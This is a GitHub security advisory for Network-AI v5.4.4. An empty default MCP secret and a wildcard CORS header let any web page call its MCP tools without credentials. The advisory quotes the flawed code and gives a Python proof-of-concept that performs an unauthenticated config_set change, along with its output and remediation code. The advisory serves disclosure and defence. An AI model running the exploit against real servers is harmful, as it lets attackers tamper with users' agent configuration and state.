Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

Field	Value
Repository	Jovancoding/Network-AI
Affected version	v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac)

Summary

The MCP SSE server defaults to an empty secret (process.env['NETWORK_AI_MCP_SECRET'] ?? '' at bin/mcp-server.ts:89), which causes _isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request — no Authorization header is required. Simultaneously, _handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including config_set, agent_spawn, and blackboard_write — against a default-configured localhost server.

Affected Code

bin/mcp-server.ts:89 — default secret resolves to empty string, enabling open access

    secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',

lib/mcp-transport-sse.ts:254 — auth guard short-circuits to true when secret is falsy

  private _isAuthorized(req: http.IncomingMessage): boolean {
    if (!this._opts.secret) return true;
    const authHeader = req.headers['authorization'];
    if (typeof authHeader !== 'string') return false;
    const parts = authHeader.split(' ');
    return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;
  }

lib/mcp-transport-sse.ts:272 — wildcard CORS header applied unconditionally before any auth check

  private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
    // CORS — allow any MCP client to connect
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
    res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');

lib/mcp-transport-sse.ts:367-368 — authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation

        const rpc = JSON.parse(body) as McpJsonRpcRequest;
        const response = await this._bridge.handleRPC(rpc);

Any cross-origin browser request reaches handleRPC because _isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.

Proof of Concept

Environment

Network-AI v5.4.4 (latest)
Docker container bound to 127.0.0.1:3001
Python 3 + requests

poc.py

import sys
import requests

BASE = "http://127.0.0.1:3001"

# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
    f"{BASE}/mcp",
    headers={
        "Origin": "http://evil.example.com",
        "Access-Control-Request-Method": "POST",
        "Access-Control-Request-Headers": "Content-Type",
    },
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
    print(f"RESULT: FAIL — expected ACAO='*', got {acao!r}")
    sys.exit(1)

# Step 2: Invoke config_set with NO Authorization header from cross-origin
rpc_payload = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "config_set",
        "arguments": {
            "key": "maxParallelAgents",
            "value": "999"
        }
    }
}
resp = requests.post(
    f"{BASE}/mcp",
    json=rpc_payload,
    headers={
        "Content-Type": "application/json",
        "Origin": "http://evil.example.com",
        # No Authorization header — exploiting empty-secret bypass
    },
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}")
print(f"[*] Response body: {resp.text[:800]}")
resp_acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}")
if resp.status_code != 200:
    print(f"RESULT: FAIL — expected 200, got {resp.status_code}")
    sys.exit(1)

body = resp.json()
result_content = body.get("result", {})
is_error = result_content.get("isError", True)
if is_error:
    print(f"RESULT: FAIL — tool returned isError=true: {result_content}")
    sys.exit(1)

# Step 3: Confirm CORS header on actual response (browser can read it)
if resp_acao != "*":
    print(f"RESULT: FAIL — response ACAO not '*', browser would block read: {resp_acao!r}")
    sys.exit(1)

print(f"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)")

Output

[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)

Verified conditions

OPTIONS /mcp → 204, Access-Control-Allow-Origin: * — browser preflight accepted by server
POST /mcp (no Authorization header) → 200, isError: false — config_set executed without credentials
Response Access-Control-Allow-Origin: * — response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page

Impact

Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config_set); the same vector applies to agent_spawn (spawning arbitrary agents), blackboard_write / blackboard_delete (corrupting shared agent state), and token_create / token_revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).

Remediation

Require a non-empty secret at startup: in bin/mcp-server.ts, reject launch when args.secret is empty and --stdio is not set:

if (!args.secret && !args.stdio) {
  console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.');
  process.exit(1);
}

Restrict CORS to localhost origins only: in lib/mcp-transport-sse.ts:_handleRequest, replace the wildcard with an allowlist:

const origin = req.headers['origin'] ?? '';
const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin);
res.setHeader('Access-Control-Allow-Origin', allowed ? origin : '');
res.setHeader('Vary', 'Origin');

Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (/sse) if cross-origin streaming is needed and not on /mcp.

References

GHSA-j3vx-cx2r-pvg8

Jovancoding published to Jovancoding/Network-AI May 16, 2026

Published to the GitHub Advisory Database May 21, 2026

Reviewed May 21, 2026

Last updated May 21, 2026

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Network-AI: Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

Package

Affected versions

Patched versions

Description

Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

Summary

Affected Code

Proof of Concept

Impact

Remediation

References

Severity

CVSS overall score

CVSS v3 base metrics

CVSS v3 base metrics

EPSS score

Weaknesses

Origin Validation Error

CVE ID

GHSA ID

Source code

Credits

Uh oh!